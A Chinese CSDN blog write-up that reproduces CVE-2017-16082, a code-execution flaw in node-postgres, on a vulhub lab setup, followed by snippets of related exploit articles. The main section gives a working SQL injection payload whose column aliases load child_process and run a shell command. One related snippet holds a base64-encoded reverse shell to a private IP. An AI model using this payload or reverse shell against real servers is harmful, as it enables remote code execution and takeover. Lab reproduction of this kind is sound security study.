Node-postgres 代码执行漏洞 CVE-2017-16082 漏洞复现

最新推荐文章于 2022-09-21 22:32:13 发布
最新推荐文章于 2022-09-21 22:32:13 发布
阅读量792 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 网络安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114527271
版权

Node-postgres 代码执行漏洞(CVE-2017-16082)

by ADummy

0x00利用路线

​ 直接url执行

0x01漏洞介绍

​ node-postgres在处理类型为Row Description的postgres返回包时,将字段名拼接到代码中。由于没有进行合理转义,导致一个特殊构造的字段名可逃逸出代码单引号限制,造成代码执行漏洞。

0x02漏洞复现

那么,我们就可以猜测这里存在node-postgres的代码执行漏洞。编写我想执行的命令touch /tmp/success,然后适当分割(每段长度不超过64字符)后替换在如下payload中:

SELECT 1 AS "\']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`touch /tmp/success`)//"

///注意url编码

在这里插入图片描述
在这里插入图片描述

ADummy_
关注
专栏目录
purescript-node-postgres:node-postgres的PureScript绑定
03-03
Node-postgres的PureScript绑定 用于PureScript绑定(在GitHub上为 )。 安装 克隆项目并安装其依赖项: git clone https://github.com/epost/purescript-node-postgres cd purescript-node-postgres npm install ...
node-postgres-代码执行CVE-2017-16082
最新发布
bqnagus
10-02 730
node-postgres在处理类型为`Row Description`的postgres返回包时,将字段名拼接到代码中。由于没有进行合理转义,导致一个特殊构造的字段名可逃逸出代码单引号限制,造成代码执行漏洞
node-postgres 代码执行漏洞CVE-2017-16082
EC_Carrot的博客
07-17 612
漏洞原理 请参考这篇文章:https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html 漏洞复现 我这里用的是vulhub的环境,启动环境后,访问http://your-ip:3000/?id=1即可查看到id为1的用户信息,当然id这里存在注入点,我们利用poc来RCE。比如我想执行命令echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyOC85OS
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
CVE-2017-15715漏洞复现
大方子
07-25 1万+
复现环境 docke apache 2.4.0到2.4.29即可 php5.5 复现过程 先在物理机上创建目录 mkdir -p /var/www/html 然后创建个容器,并关联物理机的/var/www/html目录 docker run -d -v /var/www/html:/var/www/html -p 8080:80 --name apache php...
office漏洞 (CVE-2017-11882)复现
芥子
01-25 3729
在/usr/share/metasploit-framework/modules/exploits/windows/smb上传 cve_2017_1182.rb 在/usr/share/metasploit-framework/data/exploits上传cve-2017-1182.rtf文件 以上的文件准备好后即可用msf来进行操作 在搜索模块的时候出现以下错误
Weblogic(CVE-2017-10271)的漏洞复现
陈瘦瘦的迪迦的博客
08-05 1220
Weblogic(CVE-2017-10271)漏洞复现 漏洞形成原因 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞如何利用 利用服务器的XMLDecoder可以解析XML数据这一特性,可以构造XML语句,上传一句话木马,getshell。 漏洞复现过程 Kali docker 容器中启动此漏洞环境 浏览器访问 Kali 的 ip 地址并接上
node-pg-pool:node-postgres的连接池
02-05
pg池 此仓库已合并到 monorepo中。 请在那边提交问题和PR! 执照 MIT许可证(MIT)版权所有(c)2016 Brian M.Carlson 特此免费授予获得该软件和相关文档文件(“软件”)副本的任何人无限制使用软件的权利,包括但...
node-postgres-docs:node-postgres 的文档
08-03
node-postgres 文档仓库 此 repo 包含在运行的文档。 它建立在我找到并修改的 gatsby 模板上。 我想在某个时候完成并将 gatsby 脚手架代码转换为打字稿。 如果文档中的任何内容不清楚,请随时打开一个问题或只是...
node-postgres:node.js的PostgreSQL客户端
02-05
节点postgres Node.js的非阻塞PostgreSQL客户端。 纯JavaScript和可选的本机libpq绑定。 莫诺瑞波 此仓库是一个单仓库,它包含核心模块以及一些相关模块。 文献资料 此仓库中的每个软件包都应有自己的自述文件,...
node-red-contrib-postgres-multi:node-red-contrib-postgres的多查询变体
05-01
节点红色贡献postgres多用于查询节点,具有多个查询支持...安装在您的Node-RED安装的根目录中运行以下命令npm install node-red-contrib-postgres-multi用法将查询组合为msg.payload上的对象数组: msg.payload = [ {
利用最新Apache解析漏洞CVE-2017-15715)绕过上传黑名单
大方子
08-25 2万+
我在代码审计知识星球里提到了Apache最新的一个解析漏洞CVE-2017-15715): 除了帖子中说到的利用方法,我们还可以利用这个漏洞来绕过上传黑名单限制。 目标环境 比如,目标存在一个上传的逻辑:   <?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext =...
Tomcat任意文件上传漏洞CVE-2017-12615复现测试
热门推荐
黑面狐
09-20 3万+
今天爆出了一个tomcat7的任意文件上传漏洞,看了大牛们的分析后,我自己本地搭建环境复测。 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 我本地下载的是tomcat7.0.56版本测试 测试过程: 1.下载tomcat7.0.0-7.0.81版本,解压后修改conf/web.xml文件添加readonly参数,属性值为false 如图: 然后启动tom
CVE-2017-13156 Janus 漏洞分析
xyz326547445的专栏
05-08 2223
Janus漏洞 “Janus”安卓漏洞漏洞编号:CVE-2017-13156)是Google在2017年12月发布的安卓系统安全公告中披露的一个漏洞。该漏洞可以绕过安卓系统的signature scheme V1签名机制,使攻击者在不改变原来apk签名的情况下,植入恶意代码漏洞简析 漏洞前提1:虚拟机 Janus漏洞出现于Android5.0及以上系统,原因是Androi...
Tomcat PUT方法任意写文件漏洞复现CVE-2017-12615)
whojoe的博客
07-11 584
ATomcat PUT方法任意写文件漏洞复现CVE-2017-12615)前言环境搭建漏洞复现参考文章 前言 影响版本 Apache Tomcat 7.0.0 - 7.0.81 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-XXE/cd vulhub
反序列化漏洞CVE-2017-10271复现
春日野穹
10-23 1800
0x1 漏洞详情 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器 的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性 0x2 漏洞检测 通过常用的反序列化工具检测可以发现...
node.js + postgres 从注入到Getshell
weixin_34313182的博客
11-07 204
【转】http://bobao.360.cn/learning/detail/4657.html 前言(最近你们可能会看到我发很多陈年漏洞的分析,其实这些漏洞刚出来我就想写,不过是没时间,拖延拖延,但该做的事迟早要做的,共勉)Postgres是现在用的比较多的数据库,包括我自己的博客,数据库都选择使用Postgres,其优点我就不展开说了。node-postgres是node...
速修复!开源编辑器CKEditor 中存在两个严重XSS漏洞,影响Drupal 和其它下游应用...
smellycat000的专栏
11-22 2636
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
Postgres-XL 2022:灵活的SQL集群部署指南
Postgres-XL是一款基于PostgreSQL的高性能分布式SQL数据库集群,它旨在提供横向扩展能力和多模式的数据库应用场景支持,包括高并发OLTP(在线事务处理)和大规模并行处理(OLAP)的商业智能分析。XL的名称来源于其可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值